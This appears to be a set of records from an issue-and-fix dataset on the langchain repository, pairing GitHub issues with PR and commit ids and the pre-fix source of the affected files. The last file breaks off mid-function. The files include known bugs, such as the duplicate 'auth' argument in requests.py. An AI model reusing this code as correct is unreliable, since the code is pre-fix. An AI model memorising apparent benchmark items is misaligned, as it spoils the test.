OpenAPI request.""" headers: Any = None tiktoken_model_name: Optional[str] = None """The model name to pass to tiktoken when using this class. Tiktoken is used to count the number of tokens in documents to constrain them to be under a certain limit. By default, when set to None, this will be the same as the embedding model name. However, there are some cases where you may want to use this Embedding class with a model name not supported by tiktoken. This can include when using Azure embeddings or when using one of the many model providers that expose an OpenAI-like API but with different models. In those cases, in order to avoid erroring when tiktoken is called, you can specify a model name to use here.""" show_progress_bar: bool = False """Whether to show a progress bar when embedding.""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" skip_empty: bool = False """Whether to skip empty strings when embedding or raise an error. Defaults to not skipping.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = get_pydantic_field_names(cls) extra = values.get("model_kwargs", {}) for field_name in list(values): if field_name in extra: raise ValueError(f"Found {field_name} supplied twice.") if field_name not in all_required_field_names: warnings.warn( f"""WARNING! {field_name} is not default parameter. {field_name} was transferred to model_kwargs. Please confirm that {field_name} is what you intended.""" ) extra[field_name] = values.pop(field_name) invalid_model_kwargs = all_required_field_names.intersection(extra.keys()) if invalid_model_kwargs: raise ValueError( f"Parameters {invalid_model_kwargs} should be specified explicitly. " f"Instead they were passed in as part of `model_kwargs` parameter." ) values["model_kwargs"] = extra return values @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", default="", ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) if values["openai_api_type"] in ("azure", "azure_ad", "azuread"): default_api_version = "2022-12-01" else: default_api_version = "" values["openai_api_version"] = get_from_dict_or_env( values, "openai_api_version", "OPENAI_API_VERSION", default=default_api_version, ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) try: import openai values["client"] = openai.Embedding except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) return values @property def _invocation_params(self) -> Dict: openai_args = { "model": self.model, "request_timeout": self.request_timeout, "headers": self.headers, "api_key": self.openai_api_key, "organization": self.openai_organization, "api_base": self.openai_api_base, "api_type": self.openai_api_type, "api_version": self.openai_api_version, **self.model_kwargs, } if self.openai_api_type in ("azure", "azure_ad", "azuread"): openai_args["engine"] = self.deployment if self.openai_proxy: try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) openai.proxy = { "http": self.openai_proxy, "https": self.openai_proxy, } # type: ignore[assignment] # noqa: E501 return openai_args # please refer to # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb def _get_len_safe_embeddings( self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None ) -> List[List[float]]: embeddings: List[List[float]] = [[] for _ in range(len(texts))] try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to for OpenAIEmbeddings. " "Please install it with `pip install tiktoken`." ) tokens = [] indices = [] model_name = self.tiktoken_model_name or self.model try: encoding = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken.get_encoding(model) for i, text in enumerate(texts): if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") token = encoding.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) for j in range(0, len(token), self.embedding_ctx_length): tokens.append(token[j : j + self.embedding_ctx_length]) indices.append(i) batched_embeddings: List[List[float]] = [] _chunk_size = chunk_size or self.chunk_size if self.show_progress_bar: try: from tqdm.auto import tqdm _iter = tqdm(range(0, len(tokens), _chunk_size)) except ImportError: _iter = range(0, len(tokens), _chunk_size) else: _iter = range(0, len(tokens), _chunk_size) for i in _iter: response = embed_with_retry( self, input=tokens[i : i + _chunk_size], **self._invocation_params, ) batched_embeddings.extend(r["embedding"] for r in response["data"]) results: List[List[List[float]]] = [[] for _ in range(len(texts))] num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))] for i in range(len(indices)): if self.skip_empty and len(batched_embeddings[i]) == 1: continue results[indices[i]].append(batched_embeddings[i]) num_tokens_in_batch[indices[i]].append(len(tokens[i])) for i in range(len(texts)): _result = results[i] if len(_result) == 0: average = embed_with_retry( self, input="", **self._invocation_params, )[ "data" ][0]["embedding"] else: average = np.average(_result, axis=0, weights=num_tokens_in_batch[i]) embeddings[i] = (average / np.linalg.norm(average)).tolist() return embeddings # please refer to # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb async def _aget_len_safe_embeddings( self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None ) -> List[List[float]]: embeddings: List[List[float]] = [[] for _ in range(len(texts))] try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to for OpenAIEmbeddings. " "Please install it with `pip install tiktoken`." ) tokens = [] indices = [] model_name = self.tiktoken_model_name or self.model try: encoding = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken.get_encoding(model) for i, text in enumerate(texts): if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") token = encoding.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) for j in range(0, len(token), self.embedding_ctx_length): tokens.append(token[j : j + self.embedding_ctx_length]) indices.append(i) batched_embeddings: List[List[float]] = [] _chunk_size = chunk_size or self.chunk_size for i in range(0, len(tokens), _chunk_size): response = await async_embed_with_retry( self, input=tokens[i : i + _chunk_size], **self._invocation_params, ) batched_embeddings.extend(r["embedding"] for r in response["data"]) results: List[List[List[float]]] = [[] for _ in range(len(texts))] num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))] for i in range(len(indices)): results[indices[i]].append(batched_embeddings[i]) num_tokens_in_batch[indices[i]].append(len(tokens[i])) for i in range(len(texts)): _result = results[i] if len(_result) == 0: average = ( await async_embed_with_retry( self, input="", **self._invocation_params, ) )["data"][0]["embedding"] else: average = np.average(_result, axis=0, weights=num_tokens_in_batch[i]) embeddings[i] = (average / np.linalg.norm(average)).tolist() return embeddings def embed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to OpenAI's embedding endpoint for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # NOTE: to keep things simple, we assume the list may contain texts longer # than the maximum context and use length-safe embedding function. return self._get_len_safe_embeddings(texts, engine=self.deployment) async def aembed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to OpenAI's embedding endpoint async for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # NOTE: to keep things simple, we assume the list may contain texts longer # than the maximum context and use length-safe embedding function. return await self._aget_len_safe_embeddings(texts, engine=self.deployment) def embed_query(self, text: str) -> List[float]: """Call out to OpenAI's embedding endpoint for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ return self.embed_documents([text])[0] async def aembed_query(self, text: str) -> List[float]: """Call out to OpenAI's embedding endpoint async for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ embeddings = await self.aembed_documents([text]) return embeddings[0]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,941
Issue: `make coverage` doesn't work locally
### Issue you'd like to raise. When I set up the local environment and try to run `make coverage`, I get this error: ```bash ; make coverage poetry run pytest --cov \ --cov-config=.coveragerc \ --cov-report xml \ --cov-report term-missing:skip-covered ================================================================================================================ test session starts ================================================================================================================ platform darwin -- Python 3.9.17, pytest-7.4.0, pluggy-1.2.0 rootdir: /Users/cjameson/workspace/cjcjameson/langchain/libs/langchain configfile: pyproject.toml plugins: asyncio-0.20.3, cov-4.1.0, vcr-1.0.2, syrupy-4.2.1, mock-3.11.1, anyio-3.7.1, dotenv-0.5.2, socket-0.6.0 asyncio: mode=strict collected 2832 items / 1 error / 4 skipped INTERNALERROR> Traceback (most recent call last): INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/config/__init__.py", line 1611, in getoption INTERNALERROR> val = getattr(self.option, name) INTERNALERROR> AttributeError: 'Namespace' object has no attribute 'only_extended' INTERNALERROR> INTERNALERROR> The above exception was the direct cause of the following exception: INTERNALERROR> INTERNALERROR> Traceback (most recent call last): INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 270, in wrap_session INTERNALERROR> session.exitstatus = doit(config, session) or 0 INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 323, in _main INTERNALERROR> config.hook.pytest_collection(session=session) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_hooks.py", line 433, in __call__ INTERNALERROR> return self._hookexec(self.name, self._hookimpls, kwargs, firstresult) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_manager.py", line 112, in _hookexec INTERNALERROR> return self._inner_hookexec(hook_name, methods, kwargs, firstresult) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 155, in _multicall INTERNALERROR> return outcome.get_result() INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_result.py", line 108, in get_result INTERNALERROR> raise exc.with_traceback(exc.__traceback__) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 80, in _multicall INTERNALERROR> res = hook_impl.function(*args) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 334, in pytest_collection INTERNALERROR> session.perform_collect() INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 672, in perform_collect INTERNALERROR> hook.pytest_collection_modifyitems( INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_hooks.py", line 433, in __call__ INTERNALERROR> return self._hookexec(self.name, self._hookimpls, kwargs, firstresult) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_manager.py", line 112, in _hookexec INTERNALERROR> return self._inner_hookexec(hook_name, methods, kwargs, firstresult) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 155, in _multicall INTERNALERROR> return outcome.get_result() INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_result.py", line 108, in get_result INTERNALERROR> raise exc.with_traceback(exc.__traceback__) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 80, in _multicall INTERNALERROR> res = hook_impl.function(*args) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/libs/langchain/tests/unit_tests/conftest.py", line 43, in pytest_collection_modifyitems INTERNALERROR> only_extended = config.getoption("--only-extended") or False INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/config/__init__.py", line 1622, in getoption INTERNALERROR> raise ValueError(f"no option named {name!r}") from e INTERNALERROR> ValueError: no option named 'only_extended' ====================================================================================================== 4 skipped, 1 warning, 1 error in 3.80s ======================================================================================================= make: *** [coverage] Error 3 ``` ### Suggestion: It looks like the `pytest_addoption` in `tests/unit_tests/conftest.py` is not being found. This stack-overflow attributes it to pytest not being able to find `conftest.py` files in nested directories. https://stackoverflow.com/a/31526934 The recommendations to create a plugin or move the conftest.py files don't seem palatable, but let me know if maybe that's the thing to do Given the re-organization into `libs/langchain`, that could have messed up pytest local development. I'm curious if/how it works in CI ...
https://github.com/langchain-ai/langchain/issues/10941
https://github.com/langchain-ai/langchain/pull/10974
040d436b3f0ba21028850de34dc7780cf4700e46
05d5fcfdf89abea0993998689fb8e9a8133b7276
"2023-09-22T15:58:24Z"
python
"2023-09-23T23:03:53Z"
libs/langchain/Makefile
.PHONY: all clean docs_build docs_clean docs_linkcheck api_docs_build api_docs_clean api_docs_linkcheck format lint test tests test_watch integration_tests docker_tests help extended_tests # Default target executed when no arguments are given to make. all: help ###################### # TESTING AND COVERAGE ###################### # Run unit tests and generate a coverage report. coverage: poetry run pytest --cov \ --cov-config=.coveragerc \ --cov-report xml \ --cov-report term-missing:skip-covered # Define a variable for the test file path. TEST_FILE ?= tests/unit_tests/ test: poetry run pytest --disable-socket --allow-unix-socket $(TEST_FILE) tests: poetry run pytest --disable-socket --allow-unix-socket $(TEST_FILE) extended_tests: poetry run pytest --disable-socket --allow-unix-socket --only-extended tests/unit_tests test_watch: poetry run ptw --now . -- tests/unit_tests integration_tests: poetry run pytest tests/integration_tests scheduled_tests: poetry run pytest -m scheduled tests/integration_tests docker_tests: docker build -t my-langchain-image:test . docker run --rm my-langchain-image:test ###################### # LINTING AND FORMATTING ###################### # Define a variable for Python and notebook files. PYTHON_FILES=. lint format: PYTHON_FILES=. lint_diff format_diff: PYTHON_FILES=$(shell git diff --relative=libs/langchain --name-only --diff-filter=d master | grep -E '\.py$$|\.ipynb$$') lint lint_diff: ./scripts/check_pydantic.sh . ./scripts/check_imports.sh poetry run ruff . poetry run black $(PYTHON_FILES) --check poetry run mypy $(PYTHON_FILES) format format_diff: poetry run black $(PYTHON_FILES) poetry run ruff --select I --fix $(PYTHON_FILES) spell_check: poetry run codespell --toml pyproject.toml spell_fix: poetry run codespell --toml pyproject.toml -w ###################### # HELP ###################### help: @echo '====================' @echo 'clean - run docs_clean and api_docs_clean' @echo 'docs_build - build the documentation' @echo 'docs_clean - clean the documentation build artifacts' @echo 'docs_linkcheck - run linkchecker on the documentation' @echo 'api_docs_build - build the API Reference documentation' @echo 'api_docs_clean - clean the API Reference documentation build artifacts' @echo 'api_docs_linkcheck - run linkchecker on the API Reference documentation' @echo '-- LINTING --' @echo 'format - run code formatters' @echo 'lint - run linters' @echo 'spell_check - run codespell on the project' @echo 'spell_fix - run codespell on the project and fix the errors' @echo '-- TESTS --' @echo 'coverage - run unit tests and generate coverage report' @echo 'test - run unit tests' @echo 'tests - run unit tests (alias for "make test")' @echo 'test TEST_FILE=<test_file> - run all tests in file' @echo 'extended_tests - run only extended unit tests' @echo 'test_watch - run unit tests in watch mode' @echo 'integration_tests - run integration tests' @echo 'docker_tests - run unit tests in docker' @echo '-- DOCUMENTATION tasks are from the top-level Makefile --'
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,842
TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain
### System Info Langchain version: 0.0.253 Python:3.11 ### Who can help? @agola11 @hwchase17 @eyurtsev ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [X] Async ### Reproduction 1. Environment Setup: Ensure you're using Python 3.11. Install the necessary libraries and dependencies: ```bash pip install fastapi uvicorn aiohttp langchai ``` 2. APIChain Initialization: Set up the APIChain utility using the provided API documentation and the chosen language model: ```python from langchain import APIChain chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=choosen_llm, verbose=True, headers=headers) ``` 3. Run the FastAPI application: Use a tool like Uvicorn to start your FastAPI app: ```lua uvicorn your_app_name:app --reload ``` 4. Trigger the API Endpoint: Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up. Execute the Callback: Inside the relevant endpoint, ensure you have the following snippet: ```python with get_openai_callback() as cb: response = await chain.arun(user_query) ``` 5. Observe the Error: You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. Because of providing header to APIChain and running it with ```arun``` method. ### Expected behavior Request Execution: The chain.arun(user_query) method should interact with the intended external service or API without any issues. The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions.
https://github.com/langchain-ai/langchain/issues/8842
https://github.com/langchain-ai/langchain/pull/11010
88a02076affa2accd0465ee5ea9848b68d0e812b
956ee981c03874d6e413a51eed9f7b437e52f07c
"2023-08-06T23:55:31Z"
python
"2023-09-25T14:45:04Z"
libs/langchain/langchain/utilities/requests.py
"""Lightweight wrapper around requests library, with async support.""" from contextlib import asynccontextmanager from typing import Any, AsyncGenerator, Dict, Optional import aiohttp import requests from langchain.pydantic_v1 import BaseModel, Extra class Requests(BaseModel): """Wrapper around requests to handle auth and async. The main purpose of this wrapper is to handle authentication (by saving headers) and enable easy async methods on the same base object. """ headers: Optional[Dict[str, str]] = None aiosession: Optional[aiohttp.ClientSession] = None auth: Optional[Any] = None class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True def get(self, url: str, **kwargs: Any) -> requests.Response: """GET the URL and return the text.""" return requests.get(url, headers=self.headers, auth=self.auth, **kwargs) def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """POST to the URL and return the text.""" return requests.post( url, json=data, headers=self.headers, auth=self.auth, **kwargs ) def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """PATCH the URL and return the text.""" return requests.patch( url, json=data, headers=self.headers, auth=self.auth, **kwargs ) def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """PUT the URL and return the text.""" return requests.put( url, json=data, headers=self.headers, auth=self.auth, **kwargs ) def delete(self, url: str, **kwargs: Any) -> requests.Response: """DELETE the URL and return the text.""" return requests.delete(url, headers=self.headers, auth=self.auth, **kwargs) @asynccontextmanager async def _arequest( self, method: str, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """Make an async request.""" if not self.aiosession: async with aiohttp.ClientSession() as session: async with session.request( method, url, headers=self.headers, auth=self.auth, **kwargs ) as response: yield response else: async with self.aiosession.request( method, url, headers=self.headers, auth=self.auth, **kwargs ) as response: yield response @asynccontextmanager async def aget( self, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """GET the URL and return the text asynchronously.""" async with self._arequest("GET", url, auth=self.auth, **kwargs) as response: yield response @asynccontextmanager async def apost( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """POST to the URL and return the text asynchronously.""" async with self._arequest( "POST", url, json=data, auth=self.auth, **kwargs ) as response: yield response @asynccontextmanager async def apatch( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """PATCH the URL and return the text asynchronously.""" async with self._arequest( "PATCH", url, json=data, auth=self.auth, **kwargs ) as response: yield response @asynccontextmanager async def aput( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """PUT the URL and return the text asynchronously.""" async with self._arequest( "PUT", url, json=data, auth=self.auth, **kwargs ) as response: yield response @asynccontextmanager async def adelete( self, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """DELETE the URL and return the text asynchronously.""" async with self._arequest("DELETE", url, auth=self.auth, **kwargs) as response: yield response class TextRequestsWrapper(BaseModel): """Lightweight wrapper around requests library. The main purpose of this wrapper is to always return a text output. """ headers: Optional[Dict[str, str]] = None aiosession: Optional[aiohttp.ClientSession] = None auth: Optional[Any] = None class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def requests(self) -> Requests: return Requests( headers=self.headers, aiosession=self.aiosession, auth=self.auth ) def get(self, url: str, **kwargs: Any) -> str: """GET the URL and return the text.""" return self.requests.get(url, **kwargs).text def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """POST to the URL and return the text.""" return self.requests.post(url, data, **kwargs).text def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PATCH the URL and return the text.""" return self.requests.patch(url, data, **kwargs).text def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PUT the URL and return the text.""" return self.requests.put(url, data, **kwargs).text def delete(self, url: str, **kwargs: Any) -> str: """DELETE the URL and return the text.""" return self.requests.delete(url, **kwargs).text async def aget(self, url: str, **kwargs: Any) -> str: """GET the URL and return the text asynchronously.""" async with self.requests.aget(url, **kwargs) as response: return await response.text() async def apost(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """POST to the URL and return the text asynchronously.""" async with self.requests.apost(url, data, **kwargs) as response: return await response.text() async def apatch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PATCH the URL and return the text asynchronously.""" async with self.requests.apatch(url, data, **kwargs) as response: return await response.text() async def aput(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PUT the URL and return the text asynchronously.""" async with self.requests.aput(url, data, **kwargs) as response: return await response.text() async def adelete(self, url: str, **kwargs: Any) -> str: """DELETE the URL and return the text asynchronously.""" async with self.requests.adelete(url, **kwargs) as response: return await response.text() # For backwards compatibility RequestsWrapper = TextRequestsWrapper
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,912
LocalAI embeddings shouldn't require OpenAI
### System Info macOS Ventura 13.5.2, M1 ### Who can help? @mudler ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197 ### Expected behavior Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/ I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190)
https://github.com/langchain-ai/langchain/issues/10912
https://github.com/langchain-ai/langchain/pull/10946
2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9
b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea
"2023-09-22T00:17:24Z"
python
"2023-09-29T02:56:42Z"
libs/langchain/langchain/embeddings/localai.py
from __future__ import annotations import logging import warnings from typing import ( Any, Callable, Dict, List, Literal, Optional, Sequence, Set, Tuple, Union, ) from tenacity import ( AsyncRetrying, before_sleep_log, retry, retry_if_exception_type, stop_after_attempt, wait_exponential, ) from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator from langchain.schema.embeddings import Embeddings from langchain.utils import get_from_dict_or_env, get_pydantic_field_names logger = logging.getLogger(__name__) def _create_retry_decorator(embeddings: LocalAIEmbeddings) -> Callable[[Any], Any]: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards return retry( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def _async_retry_decorator(embeddings: LocalAIEmbeddings) -> Any: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards async_retrying = AsyncRetrying( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def wrap(func: Callable) -> Callable: async def wrapped_f(*args: Any, **kwargs: Any) -> Callable: async for _ in async_retrying: return await func(*args, **kwargs) raise AssertionError("this is unreachable") return wrapped_f return wrap # https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings def _check_response(response: dict) -> dict: if any(len(d["embedding"]) == 1 for d in response["data"]): import openai raise openai.error.APIError("LocalAI API returned an empty embedding") return response def embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" retry_decorator = _create_retry_decorator(embeddings) @retry_decorator def _embed_with_retry(**kwargs: Any) -> Any: response = embeddings.client.create(**kwargs) return _check_response(response) return _embed_with_retry(**kwargs) async def async_embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" @_async_retry_decorator(embeddings) async def _async_embed_with_retry(**kwargs: Any) -> Any: response = await embeddings.client.acreate(**kwargs) return _check_response(response) return await _async_embed_with_retry(**kwargs) class LocalAIEmbeddings(BaseModel, Embeddings): """LocalAI embedding models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set to a random string. You need to specify ``OPENAI_API_BASE`` to point to your LocalAI service endpoint. Example: .. code-block:: python from langchain.embeddings import LocalAIEmbeddings openai = LocalAIEmbeddings( openai_api_key="random-key", openai_api_base="http://localhost:8080" ) """ client: Any #: :meta private: model: str = "text-embedding-ada-002" deployment: str = model openai_api_version: Optional[str] = None openai_api_base: Optional[str] = None # to support explicit proxy for LocalAI openai_proxy: Optional[str] = None embedding_ctx_length: int = 8191 """The maximum number of tokens to embed at once.""" openai_api_key: Optional[str] = None openai_organization: Optional[str] = None allowed_special: Union[Literal["all"], Set[str]] = set() disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all" chunk_size: int = 1000 """Maximum number of texts to embed in each batch""" max_retries: int = 6 """Maximum number of retries to make when generating.""" request_timeout: Optional[Union[float, Tuple[float, float]]] = None """Timeout in seconds for the LocalAI request.""" headers: Any = None show_progress_bar: bool = False """Whether to show a progress bar when embedding.""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = get_pydantic_field_names(cls) extra = values.get("model_kwargs", {}) for field_name in list(values): if field_name in extra: raise ValueError(f"Found {field_name} supplied twice.") if field_name not in all_required_field_names: warnings.warn( f"""WARNING! {field_name} is not default parameter. {field_name} was transferred to model_kwargs. Please confirm that {field_name} is what you intended.""" ) extra[field_name] = values.pop(field_name) invalid_model_kwargs = all_required_field_names.intersection(extra.keys()) if invalid_model_kwargs: raise ValueError( f"Parameters {invalid_model_kwargs} should be specified explicitly. " f"Instead they were passed in as part of `model_kwargs` parameter." ) values["model_kwargs"] = extra return values @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) values["openai_api_base"] = get_from_dict_or_env( values, "openai_api_base", "OPENAI_API_BASE", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) default_api_version = "" values["openai_api_version"] = get_from_dict_or_env( values, "openai_api_version", "OPENAI_API_VERSION", default=default_api_version, ) values["openai_organization"] = get_from_dict_or_env( values, "openai_organization", "OPENAI_ORGANIZATION", default="", ) try: import openai values["client"] = openai.Embedding except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) return values @property def _invocation_params(self) -> Dict: openai_args = { "model": self.model, "request_timeout": self.request_timeout, "headers": self.headers, "api_key": self.openai_api_key, "organization": self.openai_organization, "api_base": self.openai_api_base, "api_version": self.openai_api_version, **self.model_kwargs, } if self.openai_proxy: import openai openai.proxy = { "http": self.openai_proxy, "https": self.openai_proxy, } # type: ignore[assignment] # noqa: E501 return openai_args def _embedding_func(self, text: str, *, engine: str) -> List[float]: """Call out to LocalAI's embedding endpoint.""" # handle large input text if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") return embed_with_retry( self, input=[text], **self._invocation_params, )["data"][ 0 ]["embedding"] async def _aembedding_func(self, text: str, *, engine: str) -> List[float]: """Call out to LocalAI's embedding endpoint.""" # handle large input text if self.model.endswith("001"): # See: 